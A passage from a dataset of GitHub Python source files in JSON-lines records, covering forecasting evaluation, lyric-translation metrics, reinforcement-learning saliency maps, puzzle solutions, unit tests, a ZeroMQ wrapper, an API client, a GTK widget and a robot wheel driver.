_make_outputs(self, inputs, targets, originals):\n \"\"\"Override the make_outputs part with our generation-specific forward\n pass. I.e., no longer do one-step-ahead logit prediction, but\n rather return quantiles over the whole prediction window.\n\n We do this in concert with developing a new criterion, which\n can give us the metrics we want over the future.\n\n Returns:\n\n outputs, Tensor: NSEQ x NBATCH x N, where the last GSIZE of\n the NSEQ dimension has the prediction. N may be 3 if we have\n confidence > 0 and are doing lows, p50s, highs. Or it may be\n 9 if we are doing all the levels for WQL.\n\n \"\"\"\n # We already have inputs, targets, and values (genmode=False\n # in the client that calls this). But we ditch all that and\n # just do multi-step generation using originals, because then\n # we can just use the batch_predictor (genmode=True):\n csize, gsize = self.batch_pred.get_csize_gsize()\n if len(originals) != csize + gsize + 2:\n raise RuntimeError(\"Using originals that do not match given csize/gsize\")\n originals = originals[:csize + 2]\n originals = originals.squeeze(2).transpose(0, 1)\n ptiles = self.batch_pred(originals)\n preds = torch.stack(ptiles, 2)\n # These are NBATCH x GSIZE x N (e.g. N=3 for lows, p50s,\n # highs, N=9 when doing WQL). Let's transpose so we have GSIZE x NBATCH x N.\n preds = preds.transpose(0, 1)\n # Note these only have PREDICTIONS. But eval code expects the\n # whole sequence. So let's stick the preds at the end of this:\n my_gsize, nbatch, nptiles = preds.shape\n nseq = csize + gsize\n outputs = torch.zeros(nseq, nbatch, nptiles, device=self.device)\n outputs[-gsize:, :, :] = preds\n return outputs\n\n def __str__(self):\n \"\"\"Provide a wee bit more info here.\"\"\"\n return f\"{self.LABEL}.{self.batch_pred}\"\n","repo_name":"huaweicloud/c2far_forecasting","sub_path":"c2far/ml/evaluators/generation_evaluator.py","file_name":"generation_evaluator.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} +{"seq_id":"20230576017","text":"'''\nCompute metrics for output of trained models\n'''\n\nimport os\nimport sys\n\nsys.path.insert(1, os.path.join(sys.path[0], '../'))\n\nimport argparse\nimport datetime\nimport json\nimport re\nimport torch\nimport nltk\nimport numpy as np\nimport time\nimport warnings\nimport cmudict\nimport pyter\n\nfrom logging import getLogger\nfrom pathlib import Path\nfrom typing import Dict, List\nfrom tqdm import tqdm\nfrom models.MBarts import get_model\nfrom transformers import AutoModelForSeq2SeqLM, AutoTokenizer, MBart50TokenizerFast\n\n# from LM.ngram.language_model import LanguageModel\nfrom metrics import (\n BoundaryRecall\n)\nfrom utils_common.utils import (\n RhymeUtil, save_json, PosSeg,\n FluencyCaculator,\n # , # PerpCaculator #, FluencyCaculator2\n calculate_acc_2d,\n)\nfrom utils.utils import (\n calculate_rouge,\n chunks,\n parse_numeric_n_bool_cl_kwargs,\n use_task_specific_params,\n calculate_sacrebleu,\n calculate_sentence_bleu,\n)\n\n\ndef compute_scores(args):\n \"\"\"\n Compute metrics values for output text (given reference text).\n Reference text is optional.\n \"\"\"\n\n # if os.path.exists(args.score_path):\n # raise Exception('score_path {} exists!'.format(args.score_path))\n # ----------\n\n # Read output and reference\n with open(args.output_path) as f:\n outputs = [x.rstrip() for x in f.readlines()]\n if args.reference_path != None:\n with open(args.reference_path) as f:\n references = [x.rstrip() for x in f.readlines()]\n else:\n references = None\n\n output_lns = outputs\n reference_lns = references\n if os.path.exists(args.constraint_path):\n constraint_lns = [x.rstrip() for x in open(args.constraint_path).readlines()]\n constraint_stress_lns = [x.rstrip() for x in\n open(args.constraint_path.replace('.target', '_boundary.target')).readlines()]\n else:\n print('Constraint path not exist: {}'.format(args.constraint_path))\n constraint_lns = None\n if constraint_lns != None:\n assert len(output_lns) == len(reference_lns) == len(constraint_lns)\n\n # Compute scores\n scores: dict = calculate_sacrebleu(output_lns, reference_lns)\n\n if constraint_lns != None:\n # Read constraint target\n tgt_lens, tgt_rhymes = [], []\n for l in constraint_lns:\n t1, t2 = [int(i) for i in l.split('\\t')]\n tgt_lens.append(t1)\n tgt_rhymes.append(t2)\n\n # Compute format accuracy\n out_lens = [len(i.strip()) for i in output_lns]\n len_acc = calculate_acc(out=out_lens, tgt=tgt_lens)\n scores['format_accuracy'] = len_acc\n\n # Compute rhyme accuracy\n rhyme_util = RhymeUtil()\n if 'rev' in args.output_path:\n print('rhyme in reverse order')\n print(output_lns[0])\n out_rhymes = [rhyme_util.get_rhyme_type_of_line(line[::-1]) for line in output_lns]\n else:\n print('rhyme in normal order')\n print(output_lns[0])\n out_rhymes = [rhyme_util.get_rhyme_type_of_line(line) for line in output_lns]\n print(out_rhymes[:10], tgt_rhymes[:10])\n rhyme_acc = calculate_acc(out=out_rhymes, tgt=tgt_rhymes) # no need unconstrained token, because no 0 in rhyme target of valid and test set\n scores['rhyme_accuracy'] = rhyme_acc\n\n # Compute stress pattern accuracy\n if 'rev' in args.output_path:\n out_lines = [i[::-1] for i in output_lns] # convert the output to normal order\n else:\n out_lines = output_lns\n boundary_util = BoundaryRecall()\n boundary_recall = boundary_util.boundary_recall_batch(out_lines, constraint_stress_lns)\n scores['boundary_recall'] = boundary_recall\n\n # Compute Translate Edit Rate (TER)\n ters = [pyter.ter(out, ref) for out, ref in zip(output_lns, reference_lns)]\n ter = sum(ters) / len(ters)\n scores['TER'] = ter\n\n # # Compute fluency (SLOR metric)\n # if 'rev' in args.output_path:\n # output_lns = [s[::-1] for s in output_lns]\n # slors, perps, lm_probs, uni_probs = FluencyCaculator.compute_slor(output_lns)\n # # slors = FluencyCaculator.compute_lm_probability(output_lns)\n # v_min, v_max = np.min(slors), np.max(slors)\n # # print(v_min, v_max)\n # # slors = FluencyCaculator.normalize_to_0_and_1(slors, -3.796, 10.232) # min and max need to be updated each time\n # slor = sum(slors) / len(slors)\n\n def geo_mean(iterable):\n a = np.array(iterable)\n return a.prod() ** (1.0 / len(a))\n\n # Compute perplexity\n # calc = PerpCaculator()\n # perp = geo_mean(perps)\n # perp = calc(output_lns)\n perp = 0\n\n # lm_prob = sum(lm_probs) / len(lm_probs)\n # uni_prob = sum(uni_probs) / len(uni_probs)\n # scores['SLOR'] = (slor, v_min, v_max)\n scores['Perplexity'] = perp\n # scores['LM prob'] = lm_prob\n # scores['Unigram Prob'] = uni_prob\n\n # Save result\n save_json(scores, args.score_path)\n\n # Metric for result comparison file\n bleus = calculate_sentence_bleu(output_lns, reference_lns) # Sentence-level BLEU\n scores = {'bleu': ['{:.4f}'.format(i) for i in bleus]}\n if constraint_lns != None:\n ch_count = ['{} / {}'.format(i, j) for i, j in zip(out_lens, tgt_lens)]\n rhy_result = ['{} / {}'.format(i, j) for i, j in zip(out_rhymes, tgt_rhymes)]\n scores['len'] = ch_count\n scores['rhyme'] = rhy_result\n generate_result_comparison_file(args.source_path, args.output_path, args.reference_path, scores=scores)\n\n return\n\n\ndef count_characters(outputs, refs):\n '''\n given all output and reference lines\n count the number of characters of each line\n return actual_count / target_count\n '''\n pass\n\n\ndef calculate_acc(out, tgt, unconstrained_token=None):\n '''\n Calculate the ratio of same elements\n '''\n assert len(out) == len(tgt)\n cnt_same = 0\n for i in range(len(out)):\n if out[i] == tgt[i]:\n cnt_same += 1\n elif unconstrained_token != None:\n if tgt[i] == unconstrained_token:\n cnt_same += 1\n return cnt_same / len(out)\n\n\ndef calculate_len_dif_with_target_len(output_lns, desired_length):\n '''\n Compute average len dif and maximum len dif, between the output and the desired length\n pred: 一个batch的输出\n tgt: 一个batch对应的target length\n return: [avg_len_dif, max_len_dif]\n '''\n assert len(output_lns) == len(desired_length)\n sentence_num = min(len(output_lns), len(desired_length))\n dif_sum = 0\n max_dif = 0\n for out_s, tgt_s in zip(output_lns, desired_length):\n out_s = re.sub(r\"(?![\\u4e00-\\u9fa5]).\", \"\", out_s).strip()\n dif = abs(len(out_s) - tgt_s)\n dif_sum += dif\n if dif > max_dif:\n max_dif = dif\n return np.array([dif_sum / sentence_num, max_dif])\n\n\ndef generate_result_comparison_file(src_path, output_path, ref_path, scores):\n '''\n Generate a result comparison file to compare the generation result with ground truth.\n scores is a dict that looks like:\n scores = {\n bleu: [bleu of all sentences],\n ter: [ter of all sentences],\n }\n '''\n with open(src_path, 'r') as f:\n srcs = f.readlines()\n with open(output_path, 'r') as f:\n outputs = f.readlines()\n with open(ref_path, 'r') as f:\n refs = f.readlines()\n srcs = [s.strip() for s in srcs]\n outputs = [s.strip() for s in outputs]\n refs = [s.strip() for s in refs]\n if 'rev' in output_path:\n # print('rev in output path')\n # print(refs[:10])\n refs = [s[::-1] for s in refs]\n outputs = [s[::-1] for s in outputs]\n # print('rev not in out path')\n # print(refs[:10])\n # exit(10)\n\n # Construct file content\n ret = '----------------------------------------\\n'\n for i in range(len(outputs)):\n ret += 'Sentence {}'.format(i + 1)\n for k in scores:\n ret += ' | {}: {}'.format(k, scores[k][i])\n ret += '\\n'\n src_s = srcs[i]\n ref_s = refs[i]\n out_s = outputs[i]\n ret += 'src: {}\\n' \\\n 'ref: {}\\n' \\\n 'out: {}\\n' \\\n '----------------------------------------\\n'.format(src_s, ref_s, out_s)\n\n with open(output_path.replace('output.txt', 'result.txt'), 'w') as f:\n f.write(ret)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--source_path\", type=str, required=True, help=\"like cnn_dm/test_output.txt.\")\n parser.add_argument(\"--output_path\", type=str, required=True, help=\"like cnn_dm/test_output.txt.\")\n parser.add_argument(\"--constraint_path\", type=str, required=True, help=\"like cnn_dm/test.target\")\n parser.add_argument(\"--reference_path\", type=str, required=False, help=\"like cnn_dm/test.target\")\n parser.add_argument(\"--score_path\", type=str, required=True, default=\"metrics.json\", help=\"where to save metrics\")\n\n args = parser.parse_args()\n\n compute_scores(args)\n","repo_name":"Sonata165/ControllableLyricTranslation","sub_path":"BartFinetune/compute_metrics.py","file_name":"compute_metrics.py","file_ext":"py","file_size_in_byte":9031,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"20946866628","text":"import logging\nimport chainer\nfrom chainerrl.agents import a3c\nfrom chainer import functions as F\nimport numpy as np\n\n# Render imports\nimport gym\nimport skimage\nfrom skimage.transform import resize\nfrom skimage.color import rgb2gray\nfrom skimage.color import gray2rgb\nfrom chainerrl.misc.batch_states import batch_states\n\n\nclass SaliencyA3C(a3c.A3C):\n\n process_idx = None\n saved_attributes = ['model', 'optimizer']\n \n def __init__(self, model, optimizer, t_max, gamma, beta=1e-2,\n process_idx=0, phi=lambda x: x,\n pi_loss_coef=1.0, v_loss_coef=0.5,\n keep_loss_scale_same=False,\n normalize_grad_by_t_max=False,\n use_average_reward=False, average_reward_tau=1e-2,\n act_deterministically=False,\n average_entropy_decay=0.999,\n average_value_decay=0.999,\n batch_states=batch_states):\n \n super(SaliencyA3C, self).__init__(\n model=model,\n optimizer=optimizer,\n t_max=t_max,\n gamma=gamma,\n beta=beta,\n process_idx=process_idx,\n phi=phi,\n pi_loss_coef=pi_loss_coef,\n v_loss_coef=v_loss_coef,\n keep_loss_scale_same=keep_loss_scale_same,\n normalize_grad_by_t_max=normalize_grad_by_t_max,\n use_average_reward=use_average_reward,\n average_reward_tau=average_reward_tau,\n act_deterministically=act_deterministically,\n average_entropy_decay=average_entropy_decay,\n average_value_decay=average_value_decay,\n batch_states=batch_states\n )\n\n # Render agent input\n self.viewer_value = None\n self.viewer_logit = None\n self.render = True\n\n def act(self, obs):\n # Use the process-local model for acting\n if chainer.config.train:\n # Training\n with chainer.no_backprop_mode():\n statevar = self.batch_states([obs], np, self.phi)\n pout, _ = self.model.pi_and_v(statevar)\n \n if self.act_deterministically:\n return pout.most_probable.data[0]\n else:\n return pout.sample().data[0]\n else:\n # Testing\n self.model.cleargrads()\n\n statevar = chainer.Variable(self.batch_states(\n [obs], np, self.phi))\n pout, vout = self.model.pi_and_v(statevar)\n\n # Compute saliency maps\n saliency_map_logit = self._obtain_saliency_logit(pout, statevar)\n\n self.model.cleargrads()\n \n saliency_map_value = self._obtain_saliency_value(vout, statevar)\n\n # Compute saliency prob\n \n # render\n self._render(statevar.data[-1][-1], saliency_map_logit,\n saliency_map_value)\n \n if self.act_deterministically:\n return pout.most_probable.data[0]\n else:\n return pout.sample().data[0]\n \n def _obtain_saliency_value(self, v, statevar):\n v.backward()\n\n inputgrad = statevar.grad\n\n # print \"LINALGNORM \", np.linalg.norm(inputgrad[-1][-1], ord=2)\n # print \"NPMAX \", np.max(inputgrad[-1][-1])\n \n # Pick last image\n return np.abs(inputgrad[-1][-1])\n\n def _obtain_saliency_logit(self, p, statevar):\n \n p_max_logit = F.max(p.logits)\n p_max_logit.backward()\n inputgrad = statevar.grad\n\n return np.abs(inputgrad[-1][-1])\n\n def _render(self, raw_img, saliency_logit, saliency_value, close=False):\n img = np.zeros((raw_img.shape[0], raw_img.shape[1], 3))\n \n if close:\n if self.viewer_value is not None:\n self.viewer_value.close()\n self.viewer_value = None\n\n if self.viewer_logit is not None:\n self.viewer_logit.close()\n self.viewer_logit = None\n return\n\n # Pick last screen\n img[:, :, 0] = saliency_value * 200\n img[:, :, 1] = raw_img * 255\n img[:, :, 2] = raw_img * 255\n\n img = resize(img, (250, 250))\n\n# img = gray2rgb(raw_img*255)\n img = img.astype(np.uint8)\n \n from gym.envs.classic_control import rendering\n\n if self.viewer_value is None:\n self.viewer_value = rendering.SimpleImageViewer()\n self.viewer_value.imshow(img)\n\n # show logit\n # Pick last screen\n\n img = np.zeros((raw_img.shape[0], raw_img.shape[1], 3))\n img[:, :, 0] = raw_img * 255\n img[:, :, 1] = saliency_logit * 200\n img[:, :, 2] = raw_img * 255\n\n img = resize(img, (250, 250))\n\n# img = gray2rgb(raw_img*255)\n img = img.astype(np.uint8)\n\n if self.viewer_logit is None:\n self.viewer_logit = rendering.SimpleImageViewer()\n self.viewer_logit.imshow(img)\n\n \n","repo_name":"hmightypirate/guided-backprop-chainerrl","sub_path":"examples/mygym/saliency_a3c.py","file_name":"saliency_a3c.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"74353945352","text":"import re\n\ndata = open(\"input.txt\").read().split(\"\\n\\n\")\nextractions = [int(x) for x in data[0].split(\",\")]\n\n\nboards = [\n [[int(el) for el in re.findall(r\"\\d+\", row)] for row in board.strip().split(\"\\n\")]\n for board in data[1:]\n]\n\n\ndef board_win(board, marked):\n for row in board:\n row_win = True\n\n for el in row:\n if el not in marked:\n row_win = False\n\n if row_win:\n return True\n\n for i in range(len(board[0])):\n column_win = True\n\n for row in board:\n if row[i] not in marked:\n column_win = False\n\n if column_win:\n return True\n\n return False\n\n\ndef board_score(board, marked):\n unmarked = sum(sum(el for el in row if el not in marked) for row in board)\n\n return unmarked * marked[-1]\n\n\ndef part1(extractions, boards):\n for i in range(len(extractions)):\n for board in boards:\n if board_win(board, extractions[:i]):\n return board_score(board, extractions[:i])\n\n\ndef part2(extractions, boards):\n for i in range(len(extractions)):\n for board in boards:\n if board_win(board, extractions[:i]):\n if len(boards) == 1:\n return board_score(board, extractions[:i])\n else:\n boards.remove(board)\n\n\nprint(part1(extractions, boards))\nprint(part2(extractions, boards))\n","repo_name":"davidemerli/advent-of-code","sub_path":"2021/day04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"38357342684","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 2 16:25:51 2018\n\n@author: brich\n\"\"\"\n'''\n40. Write a Python program to split a list based on first character of word. \n\nfrom itertools import groupby\nfrom operator import itemgetter\n\nword_list = ['be','have','do','say','get','make','go','know','take','see','come','think',\n 'look','want','give','use','find','tell','ask','work','seem','feel','leave','call']\n\nfor letter, words in groupby(sorted(word_list), key=itemgetter(0)): # the key for sorting is the first character in the element\n print(letter) # print the key\n for word in words: # then print the words that belong it\n print(word)\n \n\n41. Write a Python program to create multiple lists. \n'''\n\nobj = {} # empty dictionary\nfor i in range(1, 11): # set the number of lists to be created\n obj[str(i)] = [] # create empty lists in the 'obj' distionary \nprint(obj)","repo_name":"LBri/Exs","sub_path":"cv_37.py","file_name":"cv_37.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19513061560","text":"import unittest\nfrom typing import List\n\n\nclass Solution:\n def numsSameConsecDiff(self, N: int, K: int) -> List[int]:\n if N == 1:\n return list(range(10))\n if K == 0:\n nums = []\n for i in range(1, 10):\n num = ''\n for _ in range(N):\n num += str(i)\n nums.append(int(num))\n return nums\n nums = []\n for i in range(1, 10):\n self.dfs(N-1, K, i, nums)\n return nums\n\n def dfs(self, N: int, K: int, num: int, nums: List[int]) -> None:\n if N == 0:\n nums.append(num)\n else:\n last_digit = num % 10\n if last_digit+K < 10:\n self.dfs(N-1, K, num*10+last_digit+K, nums)\n if last_digit >= K and K != 0:\n self.dfs(N-1, K, num*10+last_digit-K, nums)\n\n\nclass TestNumsSameConsecDiff(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def testNumsSameConsecDiff_1(self):\n n = 3\n k = 7\n\n nums = self.sol.numsSameConsecDiff(n, k)\n nums.sort()\n\n self.assertEqual(nums, [181, 292, 707, 818, 929])\n\n def testNumsSameConsecDiff_2(self):\n n = 2\n k = 1\n\n nums = self.sol.numsSameConsecDiff(n, k)\n nums.sort()\n\n self.assertEqual(nums, [10, 12, 21, 23, 32, 34, 43,\n 45, 54, 56, 65, 67, 76, 78,\n 87, 89, 98])\n\n def testNumsSameConsecDiff_3(self):\n n = 3\n k = 0\n\n nums = self.sol.numsSameConsecDiff(n, k)\n\n self.assertEqual(nums, [111, 222, 333, 444, 555,\n 666, 777, 888, 999])\n\n def testNumsSameConsecDiff_4(self):\n n = 1\n k = 0\n\n nums = self.sol.numsSameConsecDiff(n, k)\n\n self.assertEqual(nums, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n\n def testNumsSameConsecDiff_5(self):\n n = 3\n k = 3\n\n nums = self.sol.numsSameConsecDiff(n, k)\n nums.sort()\n\n self.assertEqual(nums, [141, 147, 252, 258, 303, 363,\n 369, 414, 474, 525, 585, 630,\n 636, 696, 741, 747, 852, 858,\n 963, 969])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"brigitteunger/katas","sub_path":"test_numbers_with_same_consecutive_differences.py","file_name":"test_numbers_with_same_consecutive_differences.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72086489033","text":"import zmq.green as zmq\nfrom spider.util.retry import retry\nfrom spider.protocol import Message\n\n\nclass BaseSocket(object):\n def __init__(self, socket_type):\n self.ctx = zmq.Context()\n self.socket = self.ctx.socket(socket_type)\n\n self.socket.setsockopt(zmq.TCP_KEEPALIVE, 1)\n self.socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, 30)\n\n @retry()\n def send(self, msg: Message):\n resp = self.socket.send(msg.serialize().encode('utf8'))\n print(resp)\n\n @retry()\n def send2client(self, msg: Message):\n self.socket.send_multipart([msg.worker_id, msg.serialize()], zmq.NOBLOCK)\n\n def recv_from_client(self):\n data = self.socket.recv_multipart()\n node_id = data[0]\n msg = Message.unserialize(data[1])\n return bytes(node_id).decode('utf8'), msg\n\n @retry()\n def recv(self) -> Message:\n data = self.socket.recv()\n msg = Message.unserialize(data)\n return msg\n\n\nclass Server(BaseSocket):\n def __init__(self, host, port):\n super(Server, self).__init__(zmq.ROUTER)\n if port == 0:\n self.socket.bind_to_random_port(f\"tcp://{host}\")\n else:\n print(\"server\", host, port)\n self.socket.bind(f\"tcp://{host}:{port}\")\n self.port = port\n\n\nclass Client(BaseSocket):\n def __init__(self, host, port: str, identity: str):\n # dealer need identity to identify the client\n super(Client, self).__init__(zmq.DEALER)\n self.socket.setsockopt(zmq.IDENTITY, identity.encode('utf8'))\n self.socket.connect(\"tcp://%s:%s\" % (host, port))\n\n\nif __name__ == '__main__':\n # c = Server(host='127.0.0.1', port='7777')\n # print(c.recv_from_client())\n\n c = Client(host='127.0.0.1', port='7777', identity='测试')\n from protocol import MessageTypeEnum\n\n c.send(Message(m_type=MessageTypeEnum.WORKER, data={'1': '测试'}, client_id='a', timestamp=1))\n","repo_name":"buptwanglong/spider","sub_path":"spider/util/zmqrpc.py","file_name":"zmqrpc.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4685025769","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 28 16:17:09 2022\n\n@author: marcinskic\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_percentage_error, mean_squared_error, mean_absolute_error\n\n#TASK 1\ndata_frame = pd.read_csv(\"surgical.csv\")\ndata = data_frame.values\ndata_columns = np.array(data_frame.columns)\n\nchange_factors = data.mean(axis=0)/data.std(axis=0)\ncolumnWithBiggestChangeFactor = data_columns[change_factors==change_factors.max()][0]\nprint(\"Kolumna z najwiekszym współczynnikiem zmienności: {}\".format(columnWithBiggestChangeFactor))\n\n#TASK 2\nfig, ax = plt.subplots(1,2,figsize=(10,5))\n\nX = data[:,:-1]\ny = data[:,-1]\nax[0].hist(y)\nax[0].set_title(\"Histogram\")\nax[1].boxplot(y)\nax[1].set_title(\"Boxplot\")\nplt.show()\n\n#TASK 3\nX_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.2,random_state=2022,shuffle=False)\nlinReg = LinearRegression()\nlinReg.fit(X_train,y_train)\nweights = linReg.coef_\nweights_names = data_columns[:-1]\n\nmask_of_highest_weight = weights==weights.max()\n\nprint(\"Największy wpływ ma zmienna: {} i jej waga wynosi: {}\".format(weights_names[mask_of_highest_weight][0],weights[mask_of_highest_weight][0]))\n\n#TASK 4\ny_pred = linReg.predict(X_test)\nmape = mean_absolute_percentage_error(y_test, y_pred)\nmse = mean_squared_error(y_test,y_pred)\nmae = mean_absolute_error(y_test,y_pred)\n\nprint(\"Średni błąd absolutny w procentach: {}\".format(mape))\nprint(\"Średni błąd absolutny: {}\".format(mae))\nprint(\"Średni błąd kwadratów: {}\".format(mse))\n\n#EXTRA\nminval = min(y_test.min(),y_pred.min())\nmaxval = max(y_test.max(),y_pred.max())\n\nplt.scatter(y_test,y_pred)\nplt.plot([minval,maxval],[minval,maxval])\nplt.xlabel('y_test')\nplt.ylabel('y_pred')\nplt.show()","repo_name":"forever0424/fifth-semester","sub_path":"ai-in-python/Test1/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"3446409890","text":"#!/usr/bin/env python3\n\"\"\"\nATTOM API\nhttps://api.developer.attomdata.com\n\"\"\"\nimport copy\nimport requests\nfrom api import secrets\nfrom api import defaults\n\nURL = 'https://search.onboard-apis.com/propertyapi/v1.0.0'\nATTOM_URL = 'https://api.gateway.attomdata.com/propertyapi/v1.0.0'\nHEADERS_DEFAULT = {\n 'Accept': 'application/json',\n}\nheaders = copy.deepcopy(HEADERS_DEFAULT)\nheaders['apikey'] = secrets.API_KEY\n\ndef ping():\n \"\"\"\n ping api example property/detail by id\n \"\"\"\n path = \"property/detail\"\n params = \"id={}\".format(defaults.ID)\n headers['apikey'] = defaults.API_KEY\n\n url = \"{}/{}?{}\".format(URL, path, params)\n\n r = requests.get(url, headers=headers)\n return r.json()\n","repo_name":"johncoleman83/attom_python_client","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4528795845","text":"# Zad. 4 \r\n# Napisz skrypt, który policzy i wyświetli następujące wyrażenia:\r\n\r\nfrom math import * \r\n#Przykład Pierwszy\r\nx = 10\r\na = pow(e, 10)\r\nc = round(a,2)\r\nprint(c)\r\n\r\n#Przykład Drugi\r\nq = pow(sin(8),2)\r\ni = 5 + q\r\nw = log(i)\r\ny = pow(w, 1/6)\r\nz = round(y,2)\r\nprint(z)\r\n\r\n#Przykład Trzeci\r\n\r\n\r\n#Przykład Czwarty\r\n\r\n","repo_name":"PatrykJurczyk/Wizualizacja_Danych","sub_path":"Python Ćwiczenia 1/4.Zadanie_czwarte.py","file_name":"4.Zadanie_czwarte.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18070037873","text":"# Python imports\n\n# Lib imports\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\n# Application imports\nfrom mixins import CommonWidgetGeneratorMixin\nfrom mixins import CommonActionsMixin\n\n\n\n\nclass Replace(Gtk.Box, CommonWidgetGeneratorMixin, CommonActionsMixin):\n def __init__(self):\n super(Replace, self).__init__()\n self._name = \"Replace\"\n\n self.entry_from = Gtk.Entry()\n self.entry_to = Gtk.Entry()\n\n self.entry_from.set_hexpand(True)\n self.entry_to.set_hexpand(True)\n self.entry_from.set_placeholder_text(\"Replace From...\")\n self.entry_to.set_placeholder_text(\"Replace To...\")\n\n self.add_widgets([self.entry_from, self.entry_to])\n\n self.set_spacing(20)\n self.show_all()\n\n\n def run(self):\n fsub = self.entry_from.get_text()\n tsub = self.entry_to.get_text()\n to_changes = event_system.emit_and_await(\"get-to\")\n\n if fsub and tsub:\n new_collection = []\n print(f\"From: {fsub}\\nTo: {tsub}\")\n for name in to_changes:\n new_collection.append(name.replace(fsub, tsub))\n\n event_system.emit(\"set-to\", (new_collection,))\n event_system.emit(\"update-to\")\n","repo_name":"maximstewart/BulkR","sub_path":"src/core/widgets/replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11558516458","text":"# -*- coding: utf-8 -*-\n\nfrom parameterized import parameterized\n\nfrom tests.unittests.utils.base_test_case import BaseTestCase, request_context\nfrom tests.unittests.utils.payload.geokret_type import GeokretTypePayload\n\n\nclass TestGeokretyTypesCollection(BaseTestCase):\n \"\"\"Test GeoKrety Types collection\"\"\"\n\n @parameterized.expand([\n [None],\n ['admin'],\n ['user_1'],\n ['user_2'],\n ])\n @request_context\n def test_geokrety_types_collection_has_right_number_of_items(self, username):\n user = getattr(self, username) if username else None\n GeokretTypePayload()\\\n .get_collection(user=user)\\\n .assertCount(5)\n","repo_name":"geokrety/geokrety-api","sub_path":"tests/unittests/api/geokrety_types/test_geokrety_types_collection.py","file_name":"test_geokrety_types_collection.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"34058550708","text":"import os\r\nimport subprocess as sp\r\n\r\nMAJOR = 0\r\nMINOR = 4\r\nMICRO = 0\r\nISRELEASED = False\r\nVERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)\r\n\r\n# Return the git revision as a string\r\n# taken from numpy/numpy\r\ndef git_version():\r\n def _minimal_ext_cmd(cmd):\r\n # construct minimal environment\r\n env = {}\r\n for k in ['SYSTEMROOT', 'PATH', 'HOME']:\r\n v = os.environ.get(k)\r\n if v is not None:\r\n env[k] = v\r\n # LANGUAGE is used on win32\r\n env['LANGUAGE'] = 'C'\r\n env['LANG'] = 'C'\r\n env['LC_ALL'] = 'C'\r\n out = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.PIPE, env=env).communicate()[0]\r\n return out\r\n\r\n try:\r\n out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])\r\n GIT_REVISION = out.strip().decode('ascii')\r\n except OSError:\r\n GIT_REVISION = \"Unknown\"\r\n\r\n return GIT_REVISION\r\n\r\ndef _get_git_version():\r\n cwd = os.getcwd()\r\n\r\n # go to the main directory\r\n fdir = os.path.dirname(os.path.abspath(__file__))\r\n maindir = os.path.abspath(os.path.join(fdir, \"..\"))\r\n # maindir = fdir # os.path.join(fdir, \"..\")\r\n os.chdir(maindir)\r\n\r\n # get git version\r\n res = git_version()\r\n\r\n # restore the cwd\r\n os.chdir(cwd)\r\n return res\r\n\r\ndef get_version(build_version=False):\r\n if ISRELEASED:\r\n return VERSION\r\n\r\n # unreleased version\r\n GIT_REVISION = _get_git_version()\r\n if build_version:\r\n import datetime as dt\r\n date = dt.date.strftime(dt.datetime.now(), \"%Y%m%d%H%M%S\")\r\n return VERSION + \".dev\" + date\r\n else:\r\n return VERSION + \".dev0+\" + GIT_REVISION[:7]\r\n","repo_name":"xitorch/xitorch","sub_path":"xitorch/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"27"} +{"seq_id":"73651306632","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom duckietown_msgs.msg import WheelsCmdStamped, BoolStamped\nfrom wheels_driver.dagu_wheels_driver import DaguWheelsDriver\n\nfrom duckietown.dtros import DTROS, TopicType, NodeType\nfrom hardware_test_wheels import HardwareTestMotor, HardwareTestMotorSide\n\n\nclass WheelsDriverNode(DTROS):\n \"\"\"Node handling the motor velocities communication.\n\n Subscribes to the requested wheels commands (linear velocities, i.e. velocity for the left\n and the right wheels) and to an emergency stop flag.\n When the emergency flag `~emergency_stop` is set to `False` it actuates the wheel driver\n with the velocities received from `~wheels_cmd`. Publishes 